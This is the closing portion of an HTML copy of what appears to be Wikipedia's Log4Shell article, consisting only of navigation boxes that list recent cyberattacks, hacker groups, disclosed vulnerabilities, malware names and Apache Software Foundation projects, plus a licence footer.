<li><a href="Evide_data_breach" title="Evide data breach">Evide data breach</a></li>
<li><a href="2023_MOVEit_data_breach" title="2023 MOVEit data breach">MOVEit data breach</a></li>
<li><a href="Insomniac_Games#December_2023_leak" title="Insomniac Games">Insomniac Games data breach</a></li>
<li><a href="Polish_railway_cyberattack" class="mw-redirect" title="Polish railway cyberattack">Polish railway cyberattack</a></li>
<li><a href="British_Library_cyberattack" title="British Library cyberattack">British Library cyberattack</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2024</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="XZ_Utils_backdoor" title="XZ Utils backdoor">XZ Utils backdoor</a></li>
<li><a href="2024_cyberattack_on_Kadokawa_and_Niconico" title="2024 cyberattack on Kadokawa and Niconico">Kadokawa and Niconico</a></li>
<li><a href="2024_Change_Healthcare_ransomware_attack" class="mw-redirect" title="2024 Change Healthcare ransomware attack">Change Healthcare ransomware attack</a></li>
<li><a href="2024_Ukrainian_cyberattacks_against_Russia" title="2024 Ukrainian cyberattacks against Russia">Ukrainian cyberattacks against Russia</a></li>
<li><a href="2024_WazirX_hack" title="2024 WazirX hack">2024 WazirX hack</a></li>
<li><a href="Iranian_interference_in_the_2024_United_States_elections" title="Iranian interference in the 2024 United States elections">Trump campaign hack</a></li>
<li><a href="Fur_Affinity" title="Fur Affinity">Fur Affinity domain hijacking</a></li>
<li><a href="IRLeaks_attack_on_Iranian_banks" title="IRLeaks attack on Iranian banks">IRLeaks attack on Iranian banks</a></li>
<li><a href="Internet_Archive#Cyberattacks" title="Internet Archive">Internet Archive data breach</a></li>
<li><a href="I-Soon_leak" title="I-Soon leak">i-Soon leak</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2025</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Codebreakers_attack_on_Bank_Sepah" class="mw-redirect" title="Codebreakers attack on Bank Sepah">Codebreakers attack on Bank Sepah</a></li>
<li><a href="4chan#2020s" title="4chan">4chan hacking and data breach</a></li>
<li><a href="2025_St._Paul_cyberattack" title="2025 St. Paul cyberattack">2025 St. Paul cyberattack</a></li></ul>
</div></td></tr></tbody></table><div></div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Groups</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Anonymous_(hacker_group)" title="Anonymous (hacker group)">Anonymous</a>
<ul><li><a href="Timeline_of_events_associated_with_Anonymous" title="Timeline of events associated with Anonymous">associated events</a></li></ul></li>
<li><a href="Anonymous_Sudan" title="Anonymous Sudan">Anonymous Sudan</a></li>
<li><a href="Berserk_Bear" title="Berserk Bear">Berserk Bear</a></li>
<li><a href="BlackCat_(cyber_gang)" title="BlackCat (cyber gang)">BlackCat</a></li>
<li><a href="Clop_(cyber_gang)" title="Clop (cyber gang)">Clop</a></li>
<li><a href="Cozy_Bear" title="Cozy Bear">Cozy Bear</a></li>
<li><a href="DarkMatter_Group" title="DarkMatter Group">DarkMatter</a></li>
<li><a href="DarkSide_(hacker_group)" title="DarkSide (hacker group)">DarkSide</a></li>
<li><a href="Dark_Storm_Team" title="Dark Storm Team">Dark Storm Team</a></li>
<li><a href="Dridex" title="Dridex">Dridex</a></li>
<li><a href="Ghostwriter_(hacker_group)" title="Ghostwriter (hacker group)">Ghostwriter</a></li>
<li><a href="GnosticPlayers" title="GnosticPlayers">GnosticPlayers</a></li>
<li><a href="Guacamaya_(hacktivist_group)" title="Guacamaya (hacktivist group)">Guacamaya</a></li>
<li><a href="Hacktivist_Nepal" title="Hacktivist Nepal">Hacktivist Nepal</a></li>
<li><a href="Hafnium_(group)" title="Hafnium (group)">Hafnium</a></li>
<li><a href="Indian_Cyber_Force" title="Indian Cyber Force">Indian Cyber Force</a></li>
<li><a href="IT_Army_of_Ukraine" title="IT Army of Ukraine">IT Army of Ukraine</a></li>
<li><a href="Killnet" title="Killnet">Killnet</a></li>
<li><a href="Lapsus%24" title="Lapsus$">Lapsus$</a></li>
<li><a href="LightBasin" title="LightBasin">LightBasin</a></li>
<li><a href="LockBit" title="LockBit">LockBit</a></li>
<li><a href="OceanLotus" title="OceanLotus">OceanLotus</a></li>
<li><a href="REvil" title="REvil">REvil</a></li>
<li><a href="Sandworm_(hacker_group)" title="Sandworm (hacker group)">Sandworm</a></li>
<li><a href="Sakura_Samurai_(group)" title="Sakura Samurai (group)">Sakura Samurai</a></li>
<li><a href="ShinyHunters" title="ShinyHunters">ShinyHunters</a></li>
<li><a href="SiegedSec" title="SiegedSec">SiegedSec</a></li>
<li><a href="Wizard_Spider" title="Wizard Spider">Wizard Spider</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%"><a href="Hacker" title="Hacker">Individuals</a></th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Graham_Ivan_Clark" title="Graham Ivan Clark">Graham Ivan Clark</a></li>
<li><a href="Maia_arson_crimew" title="Maia arson crimew">maia arson crimew</a></li>
<li><a href="IntelBroker" title="IntelBroker">IntelBroker</a></li>
<li><a href="Aubrey_Cottle" title="Aubrey Cottle">Kirtaner</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Major <a href="Vulnerability_(computing)" class="mw-redirect" title="Vulnerability (computing)">vulnerabilities</a><br>publicly <a href="Full_disclosure_(computer_security)" title="Full disclosure (computer security)">disclosed</a></th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="SMBGhost" title="SMBGhost">SMBGhost</a> (2020)</li>
<li><a href="Thunderspy" title="Thunderspy">Thunderspy</a> (2020)</li>
<li><a href="PrintNightmare" title="PrintNightmare">PrintNightmare</a> (2021)</li>
<li><a href="FORCEDENTRY" title="FORCEDENTRY">FORCEDENTRY</a> (2021)</li>
<li> (2021)</li>
<li><a href="Account_pre-hijacking" title="Account pre-hijacking">Account pre-hijacking</a> (2022)</li>
<li><a href="Retbleed" title="Retbleed">Retbleed</a> (2022)</li>
<li><a href="Downfall_(security_vulnerability)" title="Downfall (security vulnerability)">Downfall</a> (2023)</li>
<li><a href="LogoFAIL" title="LogoFAIL">LogoFAIL</a> (2023)</li>
<li><a href="Reptar_(vulnerability)" title="Reptar (vulnerability)">Reptar</a> (2023)</li>
<li><a href="Terrapin_attack" title="Terrapin attack">Terrapin</a> (2023)</li>
<li><a href="GoFetch" title="GoFetch">GoFetch</a> (2024)</li>
<li><a href="Sinkclose" title="Sinkclose">Sinkclose</a> (2024)</li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Malware</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em"></div><table class="nowraplinks navbox-subgroup" style="border-spacing:0"><tbody><tr><th scope="row" class="navbox-group" style="width:1%">2020</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Adrozek" title="Adrozek">Adrozek</a></li>
<li><a href="Drovorub" title="Drovorub">Drovorub</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2021</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Predator_(spyware)" class="mw-redirect" title="Predator (spyware)">Predator</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">2022</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Cyclops_Blink" title="Cyclops Blink">Cyclops Blink</a></li>
<li><a href="Pipedream_(toolkit)" title="Pipedream (toolkit)">Pipedream</a></li></ul>
</div></td></tr></tbody></table><div></div></td></tr></tbody></table></div>
<div class="navbox-styles"></div><div role="navigation" class="navbox" aria-labelledby="The_Apache_Software_Foundation253" style="padding:3px"><table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"><tbody><tr><th scope="col" class="navbox-title" colspan="2"><div id="The_Apache_Software_Foundation253" style="font-size:114%;margin:0 4em"><a href="The_Apache_Software_Foundation" title="The Apache Software Foundation">The Apache Software Foundation</a></div></th></tr><tr><th scope="row" class="navbox-group" style="width:1%">Top-level<br>projects</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Apache_Accumulo" title="Apache Accumulo">Accumulo</a></li>
<li><a href="Apache_ActiveMQ" title="Apache ActiveMQ">ActiveMQ</a></li>
<li><a href="Apache_Airavata" title="Apache Airavata">Airavata</a></li>
<li><a href="Apache_Airflow" title="Apache Airflow">Airflow</a></li>
<li><a href="Apache_Allura" title="Apache Allura">Allura</a></li>
<li><a href="Apache_Ambari" class="mw-redirect" title="Apache Ambari">Ambari</a></li>
<li><a href="Apache_Ant" title="Apache Ant">Ant</a></li>
<li><a href="Apache_Aries" title="Apache Aries">Aries</a></li>
<li><a href="Apache_Arrow" title="Apache Arrow">Arrow</a></li>
<li><a href="Apache_HTTP_Server" title="Apache HTTP Server">Apache HTTP Server</a></li>
<li><a href="Apache_Portable_Runtime" title="Apache Portable Runtime">APR</a></li>
<li><a href="Apache_Avro" title="Apache Avro">Avro</a></li>
<li><a href="Apache_Axis" title="Apache Axis">Axis</a></li>
<li><a href="Apache_Axis2" title="Apache Axis2">Axis2</a></li>
<li><a href="Apache_Beam" title="Apache Beam">Beam</a></li>
<li><a href="Apache_Bloodhound" class="mw-redirect" title="Apache Bloodhound">Bloodhound</a></li>
<li><a href="Apache_Brooklyn" title="Apache Brooklyn">Brooklyn</a></li>
<li><a href="Apache_Calcite" title="Apache Calcite">Calcite</a></li>
<li><a href="Apache_Camel" title="Apache Camel">Camel</a></li>
<li><a href="Apache_CarbonData" title="Apache CarbonData">CarbonData</a></li>
<li><a href="Apache_Cassandra" title="Apache Cassandra">Cassandra</a></li>
<li><a href="Apache_Cayenne" title="Apache Cayenne">Cayenne</a></li>
<li><a href="Apache_CloudStack" title="Apache CloudStack">CloudStack</a></li>
<li><a href="Apache_Cocoon" title="Apache Cocoon">Cocoon</a></li>
<li><a href="Apache_Cordova" title="Apache Cordova">Cordova</a></li>
<li><a href="Apache_CouchDB" title="Apache CouchDB">CouchDB</a></li>
<li><a href="Apache_cTAKES" title="Apache cTAKES">cTAKES</a></li>
<li><a href="Apache_CXF" title="Apache CXF">CXF</a></li>
<li><a href="Apache_Derby" title="Apache Derby">Derby</a></li>
<li><a href="Apache_Directory" title="Apache Directory">Directory</a></li>
<li><a href="Apache_Drill" title="Apache Drill">Drill</a></li>
<li><a href="Apache_Druid" title="Apache Druid">Druid</a></li>
<li><a href="Apache_Empire-db" title="Apache Empire-db">Empire-db</a></li>
<li><a href="Apache_Felix" title="Apache Felix">Felix</a></li>
<li><a href="Apache_Flex" title="Apache Flex">Flex</a></li>
<li><a href="Apache_Flink" title="Apache Flink">Flink</a></li>
<li><a href="Apache_Flume" class="mw-redirect" title="Apache Flume">Flume</a></li>
<li><a href="FreeMarker" title="FreeMarker">FreeMarker</a></li>
<li><a href="Apache_Geronimo" title="Apache Geronimo">Geronimo</a></li>
<li><a href="Apache_Groovy" title="Apache Groovy">Groovy</a></li>
<li><a href="Apache_Guacamole" title="Apache Guacamole">Guacamole</a></li>
<li>Gump</li>
<li><a href="Apache_Hadoop" title="Apache Hadoop">Hadoop</a></li>
<li><a href="Apache_HBase" title="Apache HBase">HBase</a></li>
<li><a href="Apache_Helix" title="Apache Helix">Helix</a></li>
<li><a href="Apache_Hive" title="Apache Hive">Hive</a></li>
<li><a href="Apache_Iceberg" title="Apache Iceberg">Iceberg</a></li>
<li><a href="Apache_Ignite" title="Apache Ignite">Ignite</a></li>
<li><a href="Apache_Impala" title="Apache Impala">Impala</a></li>
<li><a href="Apache_Jackrabbit" title="Apache Jackrabbit">Jackrabbit</a></li>
<li><a href="Apache_James" title="Apache James">James</a></li>
<li><a href="Apache_Jena" title="Apache Jena">Jena</a></li>
<li><a href="Apache_JMeter" title="Apache JMeter">JMeter</a></li>
<li><a href="Apache_Kafka" title="Apache Kafka">Kafka</a></li>
<li><a href="Apache_Kudu" title="Apache Kudu">Kudu</a></li>
<li><a href="Apache_Kylin" title="Apache Kylin">Kylin</a></li>
<li><a href="Apache_Lucene" title="Apache Lucene">Lucene</a></li>
<li><a href="Apache_Mahout" title="Apache Mahout">Mahout</a></li>
<li><a href="Apache_Maven" title="Apache Maven">Maven</a></li>
<li><a href="Apache_MINA" title="Apache MINA">MINA</a></li>
<li><a href="Mod_perl" title="Mod perl">mod_perl</a></li>
<li><a href="Apache_MyFaces" title="Apache MyFaces">MyFaces</a></li>
<li><a href="Apache_Mynewt" title="Apache Mynewt">Mynewt</a></li>
<li><a href="Apache_NiFi" title="Apache NiFi">NiFi</a></li>
<li><a href="NetBeans" title="NetBeans">NetBeans</a></li>
<li><a href="Apache_Nutch" title="Apache Nutch">Nutch</a></li>
<li><a href="NuttX" title="NuttX">NuttX</a></li>
<li><a href="Apache_OFBiz" title="Apache OFBiz">OFBiz</a></li>
<li><a href="Apache_Oozie" title="Apache Oozie">Oozie</a></li>
<li><a href="Apache_OpenEJB" title="Apache OpenEJB">OpenEJB</a></li>
<li><a href="Apache_OpenJPA" title="Apache OpenJPA">OpenJPA</a></li>
<li><a href="Apache_OpenNLP" title="Apache OpenNLP">OpenNLP</a></li>
<li><a href="Apache_OpenOffice" title="Apache OpenOffice">OрenOffice</a></li>
<li><a href="Apache_ORC" title="Apache ORC">ORC</a></li>
<li><a href="Apache_PDFBox" title="Apache PDFBox">PDFBox</a></li>
<li><a href="Apache_Parquet" title="Apache Parquet">Parquet</a></li>
<li><a href="Apache_Phoenix" title="Apache Phoenix">Phoenix</a></li>
<li><a href="Apache_POI" title="Apache POI">POI</a></li>
<li><a href="Apache_Pig" title="Apache Pig">Pig</a></li>
<li><a href="Apache_Pinot" title="Apache Pinot">Pinot</a></li>
<li><a href="Apache_Pivot" title="Apache Pivot">Pivot</a></li>
<li><a href="Apache_Qpid" title="Apache Qpid">Qpid</a></li>
<li><a href="Apache_Roller" title="Apache Roller">Roller</a></li>
<li><a href="Apache_RocketMQ" title="Apache RocketMQ">RocketMQ</a></li>
<li><a href="Apache_Samza" title="Apache Samza">Samza</a></li>
<li><a href="Apache_Shiro" title="Apache Shiro">Shiro</a></li>
<li><a href="Apache_SINGA" title="Apache SINGA">SINGA</a></li>
<li><a href="Apache_Sling" title="Apache Sling">Sling</a></li>
<li><a href="Apache_Solr" title="Apache Solr">Solr</a></li>
<li><a href="Apache_Spark" title="Apache Spark">Spark</a></li>
<li><a href="Apache_Storm" title="Apache Storm">Storm</a></li>
<li><a href="Apache_SpamAssassin" title="Apache SpamAssassin">SpamAssassin</a></li>
<li><a href="Apache_Struts" title="Apache Struts">Struts</a>
<ul><li><a href="Apache_Struts_1" title="Apache Struts 1">1</a></li></ul></li>
<li><a href="Apache_Subversion" title="Apache Subversion">Subversion</a></li>
<li><a href="Apache_Superset" title="Apache Superset">Superset</a></li>
<li><a href="Apache_SystemDS" title="Apache SystemDS">SystemDS</a></li>
<li><a href="Apache_Tapestry" title="Apache Tapestry">Tapestry</a></li>
<li><a href="Apache_Thrift" title="Apache Thrift">Thrift</a></li>
<li><a href="Apache_Tika" title="Apache Tika">Tika</a></li>
<li><a href="Apache_TinkerPop" class="mw-redirect" title="Apache TinkerPop">TinkerPop</a></li>
<li><a href="Apache_Tomcat" title="Apache Tomcat">Tomcat</a></li>
<li><a href="Apache_Trafodion" class="mw-redirect" title="Apache Trafodion">Trafodion</a></li>
<li><a href="Apache_Traffic_Server" title="Apache Traffic Server">Traffic Server</a></li>
<li><a href="UIMA" title="UIMA">UIMA</a></li>
<li><a href="Apache_Velocity" title="Apache Velocity">Velocity</a></li>
<li><a href="Apache_Wicket" title="Apache Wicket">Wicket</a></li>
<li><a href="Apache_Xalan" title="Apache Xalan">Xalan</a></li>
<li><a href="Apache_Xerces" title="Apache Xerces">Xerces</a></li>
<li><a href="Apache_XMLBeans" title="Apache XMLBeans">XMLBeans</a></li>
<li>Yetus</li>
<li><a href="Apache_ZooKeeper" title="Apache ZooKeeper">ZooKeeper</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%"><a href="Apache_Commons" title="Apache Commons">Commons</a></th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Byte_Code_Engineering_Library" title="Byte Code Engineering Library">BCEL</a></li>
<li><a href="Bean_Scripting_Framework" title="Bean Scripting Framework">BSF</a></li>
<li><a href="Commons_Daemon" title="Commons Daemon">Daemon</a></li>
<li><a href="Apache_Jelly" title="Apache Jelly">Jelly</a></li>
<li><a href="Apache_Commons_Logging" title="Apache Commons Logging">Logging</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Incubator</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Apache_Taverna" title="Apache Taverna">Taverna</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Other projects</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Apache_Batik" title="Apache Batik">Batik</a></li>
<li><a href="Apache_FOP_(Formatting_Objects_Processor)" class="mw-redirect" title="Apache FOP (Formatting Objects Processor)">FOP</a></li>
<li><a href="Apache_Ivy" title="Apache Ivy">Ivy</a></li>
<li><a href="Log4j" title="Log4j">Log4j</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Attic</th><td class="navbox-list-with-group navbox-list navbox-odd" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Apache_Apex" title="Apache Apex">Apex</a></li>
<li><a href="AxKit" title="AxKit">AxKit</a></li>
<li><a href="Apache_Beehive" title="Apache Beehive">Beehive</a></li>
<li><a href="Apache_iBATIS" title="Apache iBATIS">iBATIS</a></li>
<li><a href="Apache_Click" title="Apache Click">Click</a></li>
<li><a href="Apache_Continuum" title="Apache Continuum">Continuum</a></li>
<li><a href="Deltacloud" title="Deltacloud">Deltacloud</a></li>
<li><a href="Etch_(protocol)" title="Etch (protocol)">Etch</a></li>
<li><a href="Apache_Giraph" title="Apache Giraph">Giraph</a></li>
<li><a href="Apache_Hama" title="Apache Hama">Hama</a></li>
<li><a href="Apache_Harmony" title="Apache Harmony">Harmony</a></li>
<li><a href="Jakarta_Project" title="Jakarta Project">Jakarta</a></li>
<li><a href="Apache_Marmotta" title="Apache Marmotta">Marmotta</a></li>
<li><a href="Apache_MXNet" title="Apache MXNet">MXNet</a></li>
<li><a href="Apache_ODE" title="Apache ODE">ODE</a></li>
<li><a href="Jini" title="Jini">River</a></li>
<li><a href="Apache_Shale" title="Apache Shale">Shale</a></li>
<li><a href="Jakarta_Slide" class="mw-redirect" title="Jakarta Slide">Slide</a></li>
<li><a href="Sqoop" title="Sqoop">Sqoop</a></li>
<li><a href="Apache_Stanbol" title="Apache Stanbol">Stanbol</a></li>
<li><a href="Apache_Tuscany" class="mw-redirect" title="Apache Tuscany">Tuscany</a></li>
<li><a href="Apache_Wave" class="mw-redirect" title="Apache Wave">Wave</a></li>
<li><a href="Apache_XML" title="Apache XML">XML</a></li></ul>
</div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Licenses</th><td class="navbox-list-with-group navbox-list navbox-even" style="width:100%;padding:0"><div style="padding:0 0.25em">
<ul><li><a href="Apache_License" title="Apache License">Apache License</a></li></ul>
</div></td></tr><tr><td class="navbox-abovebelow" colspan="2"><div>
<ul><li><span class="noviewer" typeof="mw:File"><span title="Category"></span></span> <b>Category</b></li></ul>
</div></td></tr></tbody></table></div></div><!--htdig_noindex--><div><div class="zim-footer">
This article is issued from <a class="external text" title="Last edited on 2025-07-31" href="https://en.wikipedia.org/wiki/?title=Log4Shell&amp;oldid=1303601171">Wikipedia</a>. The text is available under <a class="external text" href="https://creativecommons.org/licenses/by-sa/4.0/deed.en">Creative Commons Attribution-Share Alike 4.0</a> unless otherwise noted. Additional terms may apply for the media files.
</div>
</div><!--/htdig_noindex--></div>
</div>
</main>
</div>
</div>
</div>

</body></html>